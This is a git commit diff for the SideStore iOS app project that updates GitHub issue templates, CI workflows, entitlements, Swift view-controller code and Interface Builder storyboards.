chore: Change deployment target to 18.0

-[cleanup]: restore changes dropped from altstore-1.6.3 merge by 1713fcc

.github/CODEOWNERS

@@ -1 +1 @@
-*       @JoeMatt @lonkelle
+*       @JoeMatt @lonkelle @nythepegasus @Spidy123222 @SternXD

.github/ISSUE_TEMPLATE/bug_report.yml

@@ -2,15 +2,15 @@ name: Bug Report
 description: Report a bug
 title: "[BUG] "
 labels: ["bug"]
-assignees:
-  - naturecodevoid
+assignees: []
 body:
   - type: markdown
     attributes:
       value: |
+        ## Please note that the issue tracker is not for support
         Thanks for taking the time to fill out this bug report! Before you continue filling out the report, please **[search in GitHub Issues](https://github.com/SideStore/SideStore/issues?q=is%3Aissue+is%3Aopen) for the bug you are experiencing** in case it has already been reported.
         
-        **Please use [Discord](https://discord.gg/RgpFBX3Q3k) or [GitHub Discussions](https://github.com/SideStore/SideStore/discussions) for support.**
+        **Please use [Discord](https://discord.gg/sidestore-949183273383395328) or [GitHub Discussions](https://github.com/SideStore/SideStore/discussions) for support.**
   - type: textarea
     id: description
     attributes:

.github/ISSUE_TEMPLATE/config.yml

@@ -3,7 +3,7 @@ blank_issues_enabled: false
 
 contact_links:
   - name: Discord
-    url: https://discord.gg/RgpFBX3Q3k
+    url: https://discord.gg/sidestore-949183273383395328
     about: If you need support, please go here first instead of making an issue!
   - name: GitHub Discussions
     url: https://github.com/SideStore/SideStore/discussions

.github/ISSUE_TEMPLATE/feature_request.yml

@@ -2,15 +2,14 @@ name: Feature Request
 description: Suggest a feature
 title: "[FEATURE REQUEST] "
 labels: ["enhancement"]
-assignees:
-  - naturecodevoid
+assignees: []
 body:
   - type: markdown
     attributes:
       value: |
         Thanks for taking the time to fill out this feature request! Before you continue filling out the form, please **[search in GitHub Issues](https://github.com/SideStore/SideStore/issues?q=is%3Aissue+is%3Aopen) for the feature you are suggestion** in case it has already been suggested.
         
-        **Please use [Discord](https://discord.gg/RgpFBX3Q3k) or [GitHub Discussions](https://github.com/SideStore/SideStore/discussions) for support.**
+        **Please use [Discord](https://discord.gg/sidestore-949183273383395328) or [GitHub Discussions](https://github.com/SideStore/SideStore/discussions) for support.**
   - type: textarea
     id: description
     attributes:

.github/pull_request_template.md

@@ -10,6 +10,3 @@
 <!-- Example: -->
 - [x] Finish UI changes
 - [ ] Test
-
-<!-- If your PR doesn't close an issue, you can remove the next line. -->
-Closes #1234

.github/workflows/attach_build_products.yml

@@ -20,3 +20,58 @@ jobs:
             format: name
             addTo: pull
             # addTo: pullandissues
+  nightly-link-comment:
+    if: github.event.workflow_run.event == 'pull_request' && github.event.workflow_run.conclusion == 'success'
+    runs-on: ubuntu-latest
+    steps:
+      - uses: actions/github-script@v6
+        with:
+          # This snippet is public-domain, taken from
+          # https://github.com/oprypin/nightly.link/blob/master/.github/workflows/pr-comment.yml
+          script: |
+            async function upsertComment(owner, repo, issue_number, purpose, body) {
+              const {data: comments} = await github.rest.issues.listComments(
+                {owner, repo, issue_number});
+
+              const marker = `<!-- bot: ${purpose} -->`;
+              body = marker + "\n" + body;
+
+              const existing = comments.filter((c) => c.body.includes(marker));
+              if (existing.length > 0) {
+                const last = existing[existing.length - 1];
+                core.info(`Updating comment ${last.id}`);
+                await github.rest.issues.updateComment({
+                  owner, repo,
+                  body,
+                  comment_id: last.id,
+                });
+              } else {
+                core.info(`Creating a comment in issue / PR #${issue_number}`);
+                await github.rest.issues.createComment({issue_number, body, owner, repo});
+              }
+            }
+
+            const {owner, repo} = context.repo;
+            const run_id = ${{github.event.workflow_run.id}};
+
+            const pull_requests = ${{ toJSON(github.event.workflow_run.pull_requests) }};
+            if (!pull_requests.length) {
+              return core.error("This workflow doesn't match any pull requests!");
+            }
+
+            const artifacts = await github.paginate(
+              github.rest.actions.listWorkflowRunArtifacts, {owner, repo, run_id});
+            if (!artifacts.length) {
+              return core.error(`No artifacts found`);
+            }
+            let body = `Download the artifacts for this pull request (nightly.link):\n`;
+            for (const art of artifacts) {
+              body += `\n* [${art.name}.zip](https://nightly.link/${owner}/${repo}/actions/artifacts/${art.id}.zip)`;
+            }
+
+            core.info("Review thread message body:", body);
+
+            for (const pr of pull_requests) {
+              await upsertComment(owner, repo, pr.number,
+                "nightly-link", body);
+            }

.github/workflows/beta.yml

@@ -11,13 +11,13 @@ jobs:
       fail-fast: false
       matrix:
         include:
-          - os: 'macos-12'
-            version: '14.2'
+          - os: 'macos-14'
+            version: '15.4'
 
     runs-on: ${{ matrix.os }}
     steps:
       - name: Checkout code
-        uses: actions/checkout@v2
+        uses: actions/checkout@v4
         with:
           submodules: recursive
 
@@ -27,11 +27,25 @@ jobs:
       - name: Change version to tag
         run: sed -e '/MARKETING_VERSION = .*/s/= .*/= ${{ github.ref_name }}/' -i '' Build.xcconfig
 
+      - name: Get version
+        id: version
+        run: echo "version=$(grep MARKETING_VERSION Build.xcconfig | sed -e "s/MARKETING_VERSION = //g")" >> $GITHUB_OUTPUT
+
+      - name: Echo version
+        run: echo "${{ steps.version.outputs.version }}"
+
       - name: Setup Xcode
-        uses: maxim-lobanov/setup-xcode@v1.4.1
+        uses: maxim-lobanov/setup-xcode@v1
         with:
           xcode-version: ${{ matrix.version }}
 
+      
+      - name: Cache Build
+        uses: irgaly/xcode-cache@v1
+        with:
+          key: xcode-cache-deriveddata-${{ github.sha }}
+          restore-keys: xcode-cache-deriveddata
+
       - name: Build SideStore
         run: make build | xcpretty && exit ${PIPESTATUS[0]}
 
@@ -41,22 +55,6 @@ jobs:
       - name: Convert to IPA
         run: make ipa
 
-      - name: Upload SideStore.ipa Artifact
-        uses: actions/upload-artifact@v3.1.0
-        with:
-          name: SideStore.ipa
-          path: SideStore.ipa
-
-      - name: Upload *.dSYM Artifact
-        uses: actions/upload-artifact@v3.1.0
-        with:
-          name: SideStore-dSYM
-          path: ./*.dSYM/
-
-      - name: Get version
-        id: version
-        run: echo "version=$(grep MARKETING_VERSION Build.xcconfig | sed -e "s/MARKETING_VERSION = //g")" >> $GITHUB_OUTPUT
-
       - name: Get current date
         id: date
         run: echo "date=$(date -u +'%c')" >> $GITHUB_OUTPUT
@@ -88,3 +86,18 @@ jobs:
             Built at (UTC date): `${{ steps.date_altstore.outputs.date }}`
             Commit SHA: `${{ github.sha }}`
             Version: `${{ steps.version.outputs.version }}`
+
+      - name: Add version to IPA file name
+        run: mv SideStore.ipa SideStore-${{ steps.version.outputs.version }}.ipa
+
+      - name: Upload SideStore.ipa Artifact
+        uses: actions/upload-artifact@v4
+        with:
+          name: SideStore-${{ steps.version.outputs.version }}.ipa
+          path: SideStore-${{ steps.version.outputs.version }}.ipa
+
+      - name: Upload *.dSYM Artifact
+        uses: actions/upload-artifact@v4
+        with:
+          name: SideStore-${{ steps.version.outputs.version }}-dSYM
+          path: ./*.dSYM/

.github/workflows/increase-nightly-build-num.sh

@@ -7,7 +7,7 @@ DATE=`date -u +'%Y.%m.%d'`
 BUILD_NUM=1
 
 write() {
-    sed -e "/MARKETING_VERSION = .*/s/$/-nightly.$DATE.$BUILD_NUM/" -i '' Build.xcconfig
+    sed -e "/MARKETING_VERSION = .*/s/$/-nightly.$DATE.$BUILD_NUM+$(git rev-parse --short HEAD)/" -i '' Build.xcconfig
     echo "$DATE,$BUILD_NUM" > .nightly-build-num
 }
 

.github/workflows/nightly.yml

@@ -14,13 +14,13 @@ jobs:
       fail-fast: false
       matrix:
         include:
-          - os: 'macos-12'
-            version: '14.2'
+          - os: 'macos-14'
+            version: '15.4'
 
     runs-on: ${{ matrix.os }}
     steps:
       - name: Checkout code
-        uses: actions/checkout@v2
+        uses: actions/checkout@v4
         with:
           submodules: recursive
 
@@ -28,7 +28,7 @@ jobs:
         run: brew install ldid
 
       - name: Cache .nightly-build-num
-        uses: actions/cache@v3
+        uses: actions/cache@v4
         with:
           path: .nightly-build-num
           key: nightly-build-num
@@ -36,11 +36,24 @@ jobs:
       - name: Increase nightly build number and set as version
         run: bash .github/workflows/increase-nightly-build-num.sh
 
+      - name: Get version
+        id: version
+        run: echo "version=$(grep MARKETING_VERSION Build.xcconfig | sed -e "s/MARKETING_VERSION = //g")" >> $GITHUB_OUTPUT
+
+      - name: Echo version
+        run: echo "${{ steps.version.outputs.version }}"
+
       - name: Setup Xcode
-        uses: maxim-lobanov/setup-xcode@v1.4.1
+        uses: maxim-lobanov/setup-xcode@v1.6.0
         with:
           xcode-version: ${{ matrix.version }}
 
+      - name: Cache Build
+        uses: irgaly/xcode-cache@v1
+        with:
+          key: xcode-cache-deriveddata-${{ github.sha }}
+          restore-keys: xcode-cache-deriveddata-
+
       - name: Build SideStore
         run: make build | xcpretty && exit ${PIPESTATUS[0]}
 
@@ -50,22 +63,6 @@ jobs:
       - name: Convert to IPA
         run: make ipa
 
-      - name: Upload SideStore.ipa Artifact
-        uses: actions/upload-artifact@v3.1.0
-        with:
-          name: SideStore.ipa
-          path: SideStore.ipa
-
-      - name: Upload *.dSYM Artifact
-        uses: actions/upload-artifact@v3.1.0
-        with:
-          name: SideStore-dSYM
-          path: ./*.dSYM/
-
-      - name: Get version
-        id: version
-        run: echo "version=$(grep MARKETING_VERSION Build.xcconfig | sed -e "s/MARKETING_VERSION = //g")" >> $GITHUB_OUTPUT
-
       - name: Get current date
         id: date
         run: echo "date=$(date -u +'%c')" >> $GITHUB_OUTPUT
@@ -96,5 +93,17 @@ jobs:
             Commit SHA: `${{ github.sha }}`
             Version: `${{ steps.version.outputs.version }}`
 
-      - name: Reset cache for apps.sidestore.io/nightly
-        run: sleep 10 && curl https://apps.sidestore.io/reset-cache/nightly/${{ secrets.SIDESOURCE_KEY }}
+      - name: Add version to IPA file name
+        run: mv SideStore.ipa SideStore-${{ steps.version.outputs.version }}.ipa
+
+      - name: Upload SideStore.ipa Artifact
+        uses: actions/upload-artifact@v4
+        with:
+          name: SideStore-${{ steps.version.outputs.version }}.ipa
+          path: SideStore-${{ steps.version.outputs.version }}.ipa
+
+      - name: Upload *.dSYM Artifact
+        uses: actions/upload-artifact@v4
+        with:
+          name: SideStore-${{ steps.version.outputs.version }}-dSYM
+          path: ./*.dSYM/

.github/workflows/pr.yml

@@ -9,13 +9,13 @@ jobs:
       fail-fast: false
       matrix:
         include:
-          - os: 'macos-12'
-            version: '14.2'
+          - os: 'macos-14'
+            version: '15.4'
 
     runs-on: ${{ matrix.os }}
     steps:
       - name: Checkout code
-        uses: actions/checkout@v2
+        uses: actions/checkout@v4
         with:
           submodules: recursive
 
@@ -23,13 +23,28 @@ jobs:
         run: brew install ldid
 
       - name: Add PR suffix to version
-        run: sed -e "/MARKETING_VERSION = .*/s/\$/-pr.${{ github.event.pull_request.number }}+$(git rev-parse --short HEAD)/" -i '' Build.xcconfig
+        run: sed -e "/MARKETING_VERSION = .*/s/\$/-pr.${{ github.event.pull_request.number }}+$(git rev-parse --short ${COMMIT:-HEAD})/" -i '' Build.xcconfig
+        env:
+          COMMIT: ${{ github.event.pull_request.head.sha }}
+
+      - name: Get version
+        id: version
+        run: echo "version=$(grep MARKETING_VERSION Build.xcconfig | sed -e "s/MARKETING_VERSION = //g")" >> $GITHUB_OUTPUT
+
+      - name: Echo version
+        run: echo "${{ steps.version.outputs.version }}"
 
       - name: Setup Xcode
-        uses: maxim-lobanov/setup-xcode@v1.4.1
+        uses: maxim-lobanov/setup-xcode@v1.6.0
         with:
           xcode-version: ${{ matrix.version }}
 
+      - name: Cache Build
+        uses: irgaly/xcode-cache@v1
+        with:
+          key: xcode-cache-deriveddata-${{ github.sha }}
+          restore-keys: xcode-cache-deriveddata-
+
       - name: Build SideStore
         run: make build | xcpretty && exit ${PIPESTATUS[0]}
 
@@ -39,14 +54,17 @@ jobs:
       - name: Convert to IPA
         run: make ipa
 
+      - name: Add version to IPA file name
+        run: mv SideStore.ipa SideStore-${{ steps.version.outputs.version }}.ipa
+
       - name: Upload SideStore.ipa Artifact
-        uses: actions/upload-artifact@v3.1.0
+        uses: actions/upload-artifact@v4
         with:
-          name: SideStore.ipa
-          path: SideStore.ipa
+          name: SideStore-${{ steps.version.outputs.version }}.ipa
+          path: SideStore-${{ steps.version.outputs.version }}.ipa
 
       - name: Upload *.dSYM Artifact
-        uses: actions/upload-artifact@v3.1.0
+        uses: actions/upload-artifact@v4
         with:
-          name: SideStore-dSYM
+          name: SideStore-${{ steps.version.outputs.version }}-dSYM
           path: ./*.dSYM/

.github/workflows/stable.yml

@@ -11,13 +11,13 @@ jobs:
       fail-fast: false
       matrix:
         include:
-          - os: 'macos-12'
-            version: '14.2'
+          - os: 'macos-14'
+            version: '15.4'
 
     runs-on: ${{ matrix.os }}
     steps:
       - name: Checkout code
-        uses: actions/checkout@v2
+        uses: actions/checkout@v4
         with:
           submodules: recursive
 
@@ -27,11 +27,24 @@ jobs:
       - name: Change version to tag
         run: sed -e '/MARKETING_VERSION = .*/s/= .*/= ${{ github.ref_name }}/' -i '' Build.xcconfig
 
+      - name: Get version
+        id: version
+        run: echo "version=$(grep MARKETING_VERSION Build.xcconfig | sed -e "s/MARKETING_VERSION = //g")" >> $GITHUB_OUTPUT
+
+      - name: Echo version
+        run: echo "${{ steps.version.outputs.version }}"
+
       - name: Setup Xcode
-        uses: maxim-lobanov/setup-xcode@v1.4.1
+        uses: maxim-lobanov/setup-xcode@v1.6.0
         with:
           xcode-version: ${{ matrix.version }}
 
+      - name: Cache Build
+        uses: irgaly/xcode-cache@v1
+        with:
+          key: xcode-cache-deriveddata-${{ github.sha }}
+          restore-keys: xcode-cache-deriveddata-
+
       - name: Build SideStore
         run: make build | xcpretty && exit ${PIPESTATUS[0]}
 
@@ -41,22 +54,6 @@ jobs:
       - name: Convert to IPA
         run: make ipa
 
-      - name: Upload SideStore.ipa Artifact
-        uses: actions/upload-artifact@v3.1.0
-        with:
-          name: SideStore.ipa
-          path: SideStore.ipa
-
-      - name: Upload *.dSYM Artifact
-        uses: actions/upload-artifact@v3.1.0
-        with:
-          name: SideStore-dSYM
-          path: ./*.dSYM/
-
-      - name: Get version
-        id: version
-        run: echo "version=$(grep MARKETING_VERSION Build.xcconfig | sed -e "s/MARKETING_VERSION = //g")" >> $GITHUB_OUTPUT
-
       - name: Get current date
         id: date
         run: echo "date=$(date -u +'%c')" >> $GITHUB_OUTPUT
@@ -85,3 +82,18 @@ jobs:
             Built at (UTC date): `${{ steps.date_altstore.outputs.date }}`
             Commit SHA: `${{ github.sha }}`
             Version: `${{ steps.version.outputs.version }}`
+
+      - name: Add version to IPA file name
+        run: mv SideStore.ipa SideStore-${{ steps.version.outputs.version }}.ipa
+
+      - name: Upload SideStore.ipa Artifact
+        uses: actions/upload-artifact@v4
+        with:
+          name: SideStore-${{ steps.version.outputs.version }}.ipa
+          path: SideStore-${{ steps.version.outputs.version }}.ipa
+
+      - name: Upload *.dSYM Artifact
+        uses: actions/upload-artifact@v4
+        with:
+          name: SideStore-${{ steps.version.outputs.version }}-dSYM
+          path: ./*.dSYM/

.gitignore

@@ -19,7 +19,6 @@ archive.xcarchive
 *.perspectivev3
 !default.perspectivev3
 xcuserdata
-
 ## Other
 *.xccheckout
 *.moved-aside

.gitmodules

@@ -9,7 +9,7 @@
 	url = https://github.com/libimobiledevice/libusbmuxd.git
 [submodule "Dependencies/libplist"]
 	path = Dependencies/libplist
-	url = https://github.com/libimobiledevice/libplist.git
+	url = https://github.com/SideStore/libplist.git
 [submodule "Dependencies/MarkdownAttributedString"]
 	path = Dependencies/MarkdownAttributedString
 	url = https://github.com/chockenberry/MarkdownAttributedString.git

AltBackup/Assets.xcassets/Background.colorset/Contents.json

@@ -5,9 +5,9 @@
         "color-space" : "srgb",
         "components" : {
           "alpha" : "1.000",
-          "blue" : "0.518",
-          "green" : "0.502",
-          "red" : "0.004"
+          "blue" : "175",
+          "green" : "4",
+          "red" : "115"
         }
       },
       "idiom" : "universal"
@@ -23,9 +23,9 @@
         "color-space" : "srgb",
         "components" : {
           "alpha" : "1.000",
-          "blue" : "0.404",
-          "green" : "0.322",
-          "red" : "0.008"
+          "blue" : "150",
+          "green" : "3",
+          "red" : "99"
         }
       },
       "idiom" : "universal"

AltServer/ErrorDetailsViewController.swift

@@ -0,0 +1,48 @@
+//
+//  ErrorDetailsViewController.swift
+//  AltServer
+//
+//  Created by Riley Testut on 10/4/22.
+//  Copyright © 2022 Riley Testut. All rights reserved.
+//
+
+import AppKit
+
+class ErrorDetailsViewController: NSViewController
+{
+    var error: NSError? {
+        didSet {
+            self.update()
+        }
+    }
+    
+    @IBOutlet private var errorCodeLabel: NSTextField!
+    @IBOutlet private var detailedDescriptionLabel: NSTextField!
+    
+    override func viewDidLoad()
+    {
+        super.viewDidLoad()
+        
+        self.detailedDescriptionLabel.preferredMaxLayoutWidth = 800
+    }
+}
+
+private extension ErrorDetailsViewController
+{
+    func update()
+    {
+        if !self.isViewLoaded
+        {
+            self.loadView()
+        }
+        
+        guard let error = self.error else { return }
+        
+        self.errorCodeLabel.stringValue = error.localizedErrorCode
+        
+        let font = self.detailedDescriptionLabel.font ?? NSFont.systemFont(ofSize: 12)
+        let detailedDescription = error.formattedDetailedDescription(with: font)
+        self.detailedDescriptionLabel.attributedStringValue = detailedDescription
+    }
+}
+

AltStore.xcodeproj/project.xcworkspace/xcshareddata/swiftpm/Package.resolved

@@ -1,95 +0,0 @@
-{
-  "pins" : [
-    {
-      "identity" : "altsign",
-      "kind" : "remoteSourceControl",
-      "location" : "https://github.com/SideStore/AltSign",
-      "state" : {
-        "branch" : "master",
-        "revision" : "7e0e7edcf8fbc44ac1e35da3e9030a297aa18b84"
-      }
-    },
-    {
-      "identity" : "appcenter-sdk-apple",
-      "kind" : "remoteSourceControl",
-      "location" : "https://github.com/microsoft/appcenter-sdk-apple.git",
-      "state" : {
-        "revision" : "8354a50fe01a7e54e196d3b5493b5ab53dd5866a",
-        "version" : "4.4.2"
-      }
-    },
-    {
-      "identity" : "keychainaccess",
-      "kind" : "remoteSourceControl",
-      "location" : "https://github.com/kishikawakatsumi/KeychainAccess.git",
-      "state" : {
-        "revision" : "84e546727d66f1adc5439debad16270d0fdd04e7",
-        "version" : "4.2.2"
-      }
-    },
-    {
-      "identity" : "launchatlogin",
-      "kind" : "remoteSourceControl",
-      "location" : "https://github.com/sindresorhus/LaunchAtLogin.git",
-      "state" : {
-        "revision" : "e8171b3e38a2816f579f58f3dac1522aa39efe41",
-        "version" : "4.2.0"
-      }
-    },
-    {
-      "identity" : "nuke",
-      "kind" : "remoteSourceControl",
-      "location" : "https://github.com/kean/Nuke.git",
-      "state" : {
-        "revision" : "9318d02a8a6d20af56505c9673261c1fd3b3aebe",
-        "version" : "7.6.3"
-      }
-    },
-    {
-      "identity" : "openssl",
-      "kind" : "remoteSourceControl",
-      "location" : "https://github.com/krzyzanowskim/OpenSSL",
-      "state" : {
-        "revision" : "033fcb41dac96b1b6effa945ca1f9ade002370b2",
-        "version" : "1.1.1501"
-      }
-    },
-    {
-      "identity" : "plcrashreporter",
-      "kind" : "remoteSourceControl",
-      "location" : "https://github.com/microsoft/PLCrashReporter.git",
-      "state" : {
-        "revision" : "6b27393cad517c067dceea85fadf050e70c4ceaa",
-        "version" : "1.10.1"
-      }
-    },
-    {
-      "identity" : "semanticversion",
-      "kind" : "remoteSourceControl",
-      "location" : "https://github.com/SwiftPackageIndex/SemanticVersion.git",
-      "state" : {
-        "revision" : "fc670910dc0903cc269b3d0b776cda5703979c4e",
-        "version" : "0.3.5"
-      }
-    },
-    {
-      "identity" : "sparkle",
-      "kind" : "remoteSourceControl",
-      "location" : "https://github.com/sparkle-project/Sparkle.git",
-      "state" : {
-        "revision" : "286edd1fa22505a9e54d170e9fd07d775ea233f2",
-        "version" : "2.1.0"
-      }
-    },
-    {
-      "identity" : "stprivilegedtask",
-      "kind" : "remoteSourceControl",
-      "location" : "https://github.com/JoeMatt/STPrivilegedTask.git",
-      "state" : {
-        "branch" : "master",
-        "revision" : "10a9150ef32d444af326beba76356ae9af95a3e7"
-      }
-    }
-  ],
-  "version" : 2
-}

AltStore/AltStore-Bridging-Header.h

@@ -5,8 +5,4 @@
 #import "NSAttributedString+Markdown.h"
 #import "ALTAppPatcher.h"
 
-#import "grant_fda.h"
-#import "vm_unalign_csr.h"
-#import "helping_tools.h"
-
 #include "fragmentzip.h"

AltStore/AltStore.entitlements

@@ -2,8 +2,12 @@
 <!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
 <plist version="1.0">
 <dict>
-	<key>aps-environment</key>
-	<string>development</string>
+	<key>com.apple.developer.kernel.extended-virtual-addressing</key>
+	<true/>
+	<key>com.apple.developer.kernel.increased-debugging-memory-limit</key>
+	<true/>
+	<key>com.apple.developer.kernel.increased-memory-limit</key>
+	<true/>
 	<key>com.apple.developer.siri</key>
 	<true/>
 	<key>com.apple.security.application-groups</key>

AltStore/App Detail/AppContentViewController.swift

@@ -81,7 +81,7 @@ final class AppContentViewController: UITableViewController
         self.subtitleLabel.text = self.app.subtitle
         self.descriptionTextView.text = self.app.localizedDescription
         
-        if let version = self.app.latestVersion
+        if let version = self.app.latestAvailableVersion
         {
             self.versionDescriptionTextView.text = version.localizedDescription
             self.versionLabel.text = String(format: NSLocalizedString("Version %@", comment: ""), version.version)

AltStore/App Detail/AppViewController.swift

@@ -217,8 +217,8 @@ final class AppViewController: UIViewController
                         
             self._shouldResetLayout = false
         }
-        
-        let statusBarHeight = UIApplication.shared.statusBarFrame.height
+                
+        let statusBarHeight = self.view.window?.windowScene?.statusBarManager?.statusBarFrame.height ?? 0
         let cornerRadius = self.contentViewControllerShadowView.layer.cornerRadius
         
         let inset = 12 as CGFloat
@@ -323,7 +323,7 @@ final class AppViewController: UIViewController
         
         self.backButtonContainerView.layer.cornerRadius = self.backButtonContainerView.bounds.midY
         
-        self.scrollView.scrollIndicatorInsets.top = statusBarHeight
+        self.scrollView.verticalScrollIndicatorInsets.top = statusBarHeight
         
         // Adjust content offset + size.
         let contentOffset = self.scrollView.contentOffset
@@ -384,7 +384,7 @@ private extension AppViewController
             button.progress = progress
         }
         
-        if let versionDate = self.app.latestVersion?.date, versionDate > Date()
+        if let versionDate = self.app.latestAvailableVersion?.date, versionDate > Date()
         {
             self.bannerView.button.countdownDate = versionDate
             self.navigationBarDownloadButton.countdownDate = versionDate
@@ -510,7 +510,7 @@ extension AppViewController
             catch
             {
                 DispatchQueue.main.async {
-                    let toastView = ToastView(error: error)
+                    let toastView = ToastView(error: error, opensLog: true)
                     toastView.show(in: self)
                 }
             }

AltStore/App IDs/AppIDsViewController.swift

@@ -90,14 +90,21 @@ private extension AppIDsViewController
                 cell.bannerView.button.isUserInteractionEnabled = false
                 
                 cell.bannerView.buttonLabel.isHidden = false
-                
+
                 let currentDate = Date()
                 
-                let numberOfDays = expirationDate.numberOfCalendarDays(since: currentDate)
-                let numberOfDaysText = (numberOfDays == 1) ? NSLocalizedString("1 day", comment: "") : String(format: NSLocalizedString("%@ days", comment: ""), NSNumber(value: numberOfDays))
-                cell.bannerView.button.setTitle(numberOfDaysText.uppercased(), for: .normal)
+                let formatter = DateComponentsFormatter()
+                formatter.unitsStyle = .full
+                formatter.includesApproximationPhrase = false
+                formatter.includesTimeRemainingPhrase = false
+                formatter.allowedUnits = [.minute, .hour, .day]
+                formatter.maximumUnitCount = 1
                 
-                attributedAccessibilityLabel.mutableString.append(String(format: NSLocalizedString("Expires in %@.", comment: ""), numberOfDaysText) + " ")
+                cell.bannerView.button.setTitle((formatter.string(from: currentDate, to: expirationDate) ?? NSLocalizedString("Unknown", comment: "")).uppercased(), for: .normal)
+                
+                // formatter.includesTimeRemainingPhrase = true
+                
+                // attributedAccessibilityLabel.mutableString.append((formatter.string(from: currentDate, to: expirationDate) ?? NSLocalizedString("Unknown", comment: "")) + " ")
             }
             else
             {

AltStore/AppDelegate.swift

@@ -61,6 +61,8 @@ final class AppDelegate: UIResponder, UIApplicationDelegate {
         // Register default settings before doing anything else.
         UserDefaults.registerDefaults()
         
+        
+        
         DatabaseManager.shared.start { (error) in
             if let error = error
             {
@@ -380,7 +382,7 @@ private extension AppDelegate
                 for update in updates
                 {
                     guard !previousUpdates.contains(where: { $0[#keyPath(InstalledApp.bundleIdentifier)] == update.bundleIdentifier }) else { continue }
-                    guard let storeApp = update.storeApp, let version = storeApp.version else { continue }
+                    guard let storeApp = update.storeApp, let version = storeApp.latestSupportedVersion else { continue }
                     
                     let content = UNMutableNotificationContent()
                     content.title = NSLocalizedString("New Update Available", comment: "")

AltStore/Authentication/Authentication.storyboard

@@ -1,9 +1,9 @@
 <?xml version="1.0" encoding="UTF-8"?>
-<document type="com.apple.InterfaceBuilder3.CocoaTouch.Storyboard.XIB" version="3.0" toolsVersion="20037" targetRuntime="iOS.CocoaTouch" propertyAccessControl="none" useAutolayout="YES" useTraitCollections="YES" useSafeAreas="YES" colorMatched="YES">
+<document type="com.apple.InterfaceBuilder3.CocoaTouch.Storyboard.XIB" version="3.0" toolsVersion="32700.99.1234" targetRuntime="iOS.CocoaTouch" propertyAccessControl="none" useAutolayout="YES" useTraitCollections="YES" useSafeAreas="YES" colorMatched="YES">
     <device id="retina4_7" orientation="portrait" appearance="light"/>
     <dependencies>
         <deployment identifier="iOS"/>
-        <plugIn identifier="com.apple.InterfaceBuilder.IBCocoaTouchPlugin" version="20020"/>
+        <plugIn identifier="com.apple.InterfaceBuilder.IBCocoaTouchPlugin" version="22684"/>
         <capability name="Named colors" minToolsVersion="9.0"/>
         <capability name="Safe area layout guides" minToolsVersion="9.0"/>
         <capability name="documents saved in the Xcode 8 format" minToolsVersion="8.0"/>
@@ -13,8 +13,8 @@
         <scene sceneID="lNR-II-WoW">
             <objects>
                 <navigationController storyboardIdentifier="navigationController" id="ZTo-53-dSL" sceneMemberID="viewController">
-                    <navigationBar key="navigationBar" contentMode="scaleToFill" insetsLayoutMarginsFromSafeArea="NO" barStyle="black" largeTitles="YES" id="Aej-RF-PfV" customClass="NavigationBar" customModule="AltStore" customModuleProvider="target">
-                        <rect key="frame" x="0.0" y="0.0" width="375" height="96"/>
+                    <navigationBar key="navigationBar" contentMode="scaleToFill" insetsLayoutMarginsFromSafeArea="NO" barStyle="black" largeTitles="YES" id="Aej-RF-PfV" customClass="NavigationBar" customModule="SideStore" customModuleProvider="target">
+                        <rect key="frame" x="0.0" y="20" width="375" height="96"/>
                         <autoresizingMask key="autoresizingMask"/>
                         <color key="tintColor" white="1" alpha="1" colorSpace="custom" customColorSpace="genericGamma22GrayColorSpace"/>
                         <color key="barTintColor" name="SettingsBackground"/>
@@ -36,19 +36,19 @@
         <!--Authentication View Controller-->
         <scene sceneID="OCd-xc-Ms7">
             <objects>
-                <viewController storyboardIdentifier="authenticationViewController" id="yO1-iT-7NP" customClass="AuthenticationViewController" customModule="AltStore" customModuleProvider="target" sceneMemberID="viewController">
+                <viewController storyboardIdentifier="authenticationViewController" id="yO1-iT-7NP" customClass="AuthenticationViewController" customModule="SideStore" customModuleProvider="target" sceneMemberID="viewController">
                     <view key="view" contentMode="scaleToFill" id="mjy-4S-hyH">
                         <rect key="frame" x="0.0" y="0.0" width="375" height="667"/>
                         <autoresizingMask key="autoresizingMask" widthSizable="YES" heightSizable="YES"/>
                         <subviews>
                             <view hidden="YES" userInteractionEnabled="NO" contentMode="scaleToFill" translatesAutoresizingMaskIntoConstraints="NO" id="oyW-Fd-ojD" userLabel="Sizing View">
-                                <rect key="frame" x="0.0" y="44" width="375" height="623"/>
+                                <rect key="frame" x="0.0" y="64" width="375" height="603"/>
                             </view>
                             <scrollView clipsSubviews="YES" multipleTouchEnabled="YES" contentMode="scaleToFill" preservesSuperviewLayoutMargins="YES" alwaysBounceVertical="YES" indicatorStyle="white" keyboardDismissMode="onDrag" translatesAutoresizingMaskIntoConstraints="NO" id="WXx-hX-AXv">
                                 <rect key="frame" x="0.0" y="0.0" width="375" height="667"/>
                                 <subviews>
                                     <view contentMode="scaleToFill" preservesSuperviewLayoutMargins="YES" translatesAutoresizingMaskIntoConstraints="NO" id="2wp-qG-f0Z">
-                                        <rect key="frame" x="0.0" y="0.0" width="375" height="623"/>
+                                        <rect key="frame" x="0.0" y="0.0" width="375" height="603"/>
                                         <subviews>
                                             <stackView opaque="NO" contentMode="scaleToFill" preservesSuperviewLayoutMargins="YES" axis="vertical" spacing="50" translatesAutoresizingMaskIntoConstraints="NO" id="YmX-7v-pxh">
                                                 <rect key="frame" x="16" y="6" width="343" height="359.5"/>
@@ -57,7 +57,7 @@
                                                         <rect key="frame" x="0.0" y="0.0" width="343" height="67.5"/>
                                                         <subviews>
                                                             <label opaque="NO" userInteractionEnabled="NO" contentMode="left" horizontalHuggingPriority="251" verticalHuggingPriority="251" text="Welcome to SideStore." textAlignment="natural" lineBreakMode="tailTruncation" baselineAdjustment="alignBaselines" minimumScaleFactor="0.5" translatesAutoresizingMaskIntoConstraints="NO" id="EI2-V3-zQZ">
-                                                                <rect key="frame" x="0.0" y="0.0" width="332" height="41"/>
+                                                                <rect key="frame" x="0.0" y="0.0" width="343" height="41"/>
                                                                 <fontDescription key="fontDescription" type="boldSystem" pointSize="34"/>
                                                                 <color key="textColor" white="1" alpha="1" colorSpace="custom" customColorSpace="genericGamma22GrayColorSpace"/>
                                                                 <nil key="highlightedColor"/>
@@ -179,7 +179,7 @@
                                                 </subviews>
                                             </stackView>
                                             <stackView opaque="NO" contentMode="scaleToFill" verticalCompressionResistancePriority="250" axis="vertical" spacing="4" translatesAutoresizingMaskIntoConstraints="NO" id="DBk-rT-ZE8">
-                                                <rect key="frame" x="16" y="518.5" width="343" height="96.5"/>
+                                                <rect key="frame" x="16" y="498.5" width="343" height="96.5"/>
                                                 <subviews>
